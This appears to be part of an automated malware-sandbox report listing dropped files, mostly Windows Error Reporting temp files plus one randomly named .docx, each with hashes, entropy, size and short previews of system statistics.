C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F81.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6841242750533625
Encrypted:	false
SSDEEP:	96:TiZYW5nLkni/fIYzYpWfH6YEZ9BtFiq3XcdPwN76acauiMMTaMHIUY3:2ZDikaYA7EauiMMTaMoUY3
MD5:	008735A39C9F0793740A6B1FACD30884
SHA1:	C3C022AE1E53AF078815450C21C03E7241624CAE
SHA-256:	D0A5EF7B2FB4DE03AC7A2CB7A93C8B5AD5D28D817A2B5C374ED9132AD3908C25
SHA-512:	B2973EB09D0060559D1094DE94FA10028994EF57F3D4C75BEFF1E5D4A517D6D3A2838744DBEAA212F3FCF1E3A564079617C7037C8E8088BADA76CAEAEEFEBCF1
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8430.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	84710
Entropy (8bit):	3.0333558763298334
Encrypted:	false
SSDEEP:	1536:8KfjMEtzEP+9tQYI2r8HcGpc+fp+P+I+y+B+2+Q+r+Y+L+R+l+A+S+W2OrB+V+Co:8KfjMEtzEP+9tQYI2r8HcGpc+fp+P+II
MD5:	A8967673268D23B201DB78E797D19783
SHA1:	A4CFEE1E53CBBB7862D94D40C92A14D3FB7E479D
SHA-256:	87DCB9B3B05E1EF5A4A38843ED6E23CD2194E1C26F036C3D6C1940FE97E53A67
SHA-512:	A92556A5C3AE87D89FAE36CCC2AA16D8E5D810C316EFA8B2871D411F30D41155256C4EC09FAAE570ADB6F17F2FE54811A9F59A91FA23848A031C300988B7F527
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER856A.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6848475684681827
Encrypted:	false
SSDEEP:	96:TiZYWs0wPKYEU8YyWDHPYEZOq3tFib3TcHrw8Jzt/aAiqM6CKIIhY3:2ZD1Rjq1d/aAiqM6CKvhY3
MD5:	66E729F393467A1E292388F0F4DEB485
SHA1:	88F902C013C6CD5B206530E8B378A2E69F4C4270
SHA-256:	3E29FD2B135AF987003A79CCBB9A0E6ADDBCAF0EE375155C9859A8D3491F3860
SHA-512:	887CE8960A83F9F3A3E734FB1271BD0067C5F0300587C5FF39C47D2EE90365C8ECBF619BFB9E981FB45AD96EFD3D74D1CE0C83A063894B3DF317E809180EAF3B
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8859.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	84664
Entropy (8bit):	3.0354499415808838
Encrypted:	false
SSDEEP:	1536:QRxQPvoQPx3bslIdr8HcGpn4ep+P+I+y+B+2+Q+r+Y+L+R+l+A+S+W2OrB+V+C+2:QRxQPvoQPx3bslIdr8HcGpn4ep+P+I+u
MD5:	C551CF6DB57CD18889B8497C6A6CE5E1
SHA1:	DF20146C6866889FDBEA9D68033C638961325685
SHA-256:	D1A069750592751EB8133E67390257FF937E3AC3E15CBF52EFC4232EC0323958
SHA-512:	57E1CA2722CCEEF2E56D9572FE2452B9D278A091884084899068C03EBF9D2A5493FACD87D7C9CAF1A52A2547E28F8D3ABCEFED34CF809D0F9FC13D26EBE14021
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B67.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6849889555395037
Encrypted:	false
SSDEEP:	96:TiZYW5uMo9ddYbYFWu3HlYEZI7tFih3gc2rwMMAPnqa6ibMasCI1Y3:2ZD0MvlmACa6ibMasl1Y3
MD5:	C6000959FC3AE0548930D518F02EA858
SHA1:	83B2ACEEF1E3FC24FE6E77C1AEDC05EF4D62D39F
SHA-256:	1931EFF2D7D3EF8928BE88286F8ADC7CA1B8C6E318FF2FA3967656AA7E6026F6
SHA-512:	0D3570115D77DB28B71F93B38072FAFC83577C4AD6D9774764A62593CFB87CDD7F99C22B78FF2709367DF6E791FF21F156E7B9253308FFCAFFD7511A463D3C7E
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8E37.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	85602
Entropy (8bit):	3.0344474490690145
Encrypted:	false
SSDEEP:	1536:tfQnpvP8m0OlsFIUJ8HcNAsmcp+P+I+y+B+2+Q+r+Y+L+R+l+A+S+W2OrB+V+C+F:tfQnpvP8m0OlsFIUJ8HcNAsmcp+P+I+d
MD5:	3CB73E5EFD68DBD17C1F629CC8C5A46C
SHA1:	A7AD024FDA69E1D8FD53156967AE9E648192FDD2
SHA-256:	FEAF7252BD8D0A0F0DED061E9D2ED5C33EBE9FB7BE95C8A7A6D2953580F92018
SHA-512:	DD52C86A1BD761EC2E257C749386CC1F9180AD796AA7581DE1EC37B606F4C0E54A15CCE53BAFC2EF9A0A5BC09F1953FD77E576D28DEE5D2D124D778F86480087
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8F03.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6852434672164356
Encrypted:	false
SSDEEP:	96:TiZYWVeV0pY8Y4Wr3HRYEZgMtFir3ncprwiW3rHaki4MwtqIkY3:2ZDZrj0Tmraki4MwtdkY3
MD5:	96A80906383426E1355EFC117D0A1369
SHA1:	6A460657ED8012082D9189572BB144D3AAA0ADA4
SHA-256:	EA96677A2EC09E38796FE78365FCB6920982DD3A5BCC1427E47EBA1E2DE1B328
SHA-512:	FE4308922BFA310E2D81C26E23BE15B8D0377C5DEF025511B9F99648AEB97E979085924FDE1FFE5835571E2724F0BDE7783E424B585CB60860713046FE19A091
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DC8.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	82990
Entropy (8bit):	3.0373061466087705
Encrypted:	false
SSDEEP:	1536:0btDVyoKB5uaD5qWbzIp+P+I+y+B+2+Q+r+Y+L+R+l+A+S+W2OrB+V+C+qh:0btDVyoKB5uaD5qWbzIp+P+I+y+B+2+P
MD5:	00A17778DBE7A09FC8EE3E5B3E066960
SHA1:	A50E2D8AFBC1A6D409643F86BB8BAA20A1A367D9
SHA-256:	1330FD0A71EB22243F2394033F1DB6F6742B1CD0C841C01A216F6C577EB873FE
SHA-512:	594B241CA93F1641F9B2F051A802A992A89719822F183B1040A6EE5673D0AA768A6AF8DA6CBC9882610F25D2277059529CB1D3FE34B836FD2AABBD8DAA640CEE
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F30.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	84270
Entropy (8bit):	3.034867253110752
Encrypted:	false
SSDEEP:	1536:pJCT33P4/PwNIkJrcNA2ep+P+I+y+B+2+Q+r+Y+L+R+l+A+S+W2OrB+V+C+oY:pJCT33P4/PwNIkJrcNA2ep+P+I+y+B+E
MD5:	F58E7F1A0E0EEFE8D2577CF74802DB02
SHA1:	72FE8FC15CED5E8737D8ABF7F57A782C6DCB1C27
SHA-256:	1CE6AE50179E0698DEA7A0F4E934DE728AB46E6C744B1F60937428C1B5882009
SHA-512:	C82C65C9C8BF35042CF8BF22DB88345AFE039F9C2F3A48952EE748F39E4A9E6AB37B8E3AC09E0B1018D2D25DED6F3A3102974B854D406014654E5C0077D2AC0F
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F8E.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6899654524239405
Encrypted:	false
SSDEEP:	96:TiZYWsfVxB5YtYIHW4HlYEZW1YtFi7ESbSswgjbT7aeiAMgatxRIKY2:2ZDsDq/crjLaeiAMtLOKY2
MD5:	D135D7A9AB36D4400B787AFD97255C16
SHA1:	A2DF34EDFC1E33D85F76A7CBFBC6A590F55F934D
SHA-256:	F238EEFD1D293538F1B99AFA4B6651E297D9324B920EA5BF43E5EC73C41B7007
SHA-512:	F1E1DD04EA9C67A1446B6C7E09B083499101B0CA75AA862BB136E74E075482F57045B062E107945C986EDAD82323E96848431D49FFF2679A7DE5120659EB4FFB
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FFD.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6852448568836116
Encrypted:	false
SSDEEP:	96:TiZYWMyr/elCYjYAWTLmtH2YEZUWtFiH3ocSA5wDzj9api9MWteI9Y3:2ZDVkOcJsxapi9MWtp9Y3
MD5:	E57190E74453CE75E6ADA44BBC59071F
SHA1:	79CF5E76102C8514C6C9B1F7EDB6DA3D82ED2B60
SHA-256:	E56B00704FD633BFB21A19D3E3778CF960B1BF2D6C936D5BAA029C88E3C29EE9
SHA-512:	3F069E62E8D8E99FB0032D94B0CEC97C1E0A332AFA69C9AE8AF3F432DF23504DAF00319226180F3F743F9A2BD118AD360FC009AF7206F1B3D85E2F31E37C5A58
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\NIRMEKAMZH.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694574194309462
Encrypted:	false
SSDEEP:	24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
MD5:	78801AF1375CDD81ED0CC275FE562870
SHA1:	8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
SHA-256:	44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
SHA-512:	E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
Malicious:	false
